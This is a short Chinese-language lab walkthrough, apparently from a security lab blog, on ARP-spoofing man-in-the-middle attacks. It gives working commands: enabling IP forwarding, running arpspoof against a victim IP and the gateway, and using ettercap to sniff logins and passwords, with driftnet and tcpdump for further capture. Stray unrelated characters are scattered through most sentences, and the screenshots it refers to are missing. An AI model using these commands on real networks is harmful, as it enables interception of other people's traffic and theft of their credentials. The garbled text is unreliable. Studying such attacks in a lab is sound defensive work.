ARP欺騙是一種中間人攻擊舟扎,攻擊者通過(guò)毒化受害者的ARP緩存分飞,將網(wǎng)關(guān)的MAC替換成攻擊者的MAC,于是攻擊者的主機(jī)實(shí)際上就充當(dāng)了受害主機(jī)的網(wǎng)關(guān)睹限,之后攻擊者就可以截獲受害者發(fā)出和接到的數(shù)據(jù)包譬猫,從中獲取賬號(hào)密碼、銀行卡信息等羡疗。
一個(gè)實(shí)現(xiàn)ARP欺騙的簡(jiǎn)單工具是arpspoof
實(shí)驗(yàn)環(huán)境
受害者主機(jī):192.168.1.105
攻擊者主機(jī):192.168.1.106
實(shí)驗(yàn)過(guò)程
1.ARP欺騙攻擊之前染服,受害者主機(jī)的ARP緩存如下圖(0x7接口);
2.為使受害者主機(jī)的數(shù)據(jù)包能夠順利收發(fā)叨恨,我們需在Kali Linux中開(kāi)啟IP轉(zhuǎn)發(fā)功能:
echo 1 > /proc/sys/net/ipv4/ip_forward柳刮;
3.在終端中輸入arpspoof -t 192.168.1.105 192.168.1.1 -i eth0,并輸入ettercap -Tq -i eth0進(jìn)行賬號(hào)密碼嗅探特碳;
4.當(dāng)受害主機(jī)登錄某網(wǎng)站時(shí)诚亚,終端上就能顯示賬號(hào)和密碼;
5.我們還可以使用driftnet截獲受害者瀏覽的圖片午乓;
受害主機(jī)畫面:
攻擊者主機(jī)畫面:
6.我們也可以使用tcpdump或Wireshark工具截獲所有流量站宗。
Safesonic網(wǎng)絡(luò)安全實(shí)驗(yàn)室2016年08月21日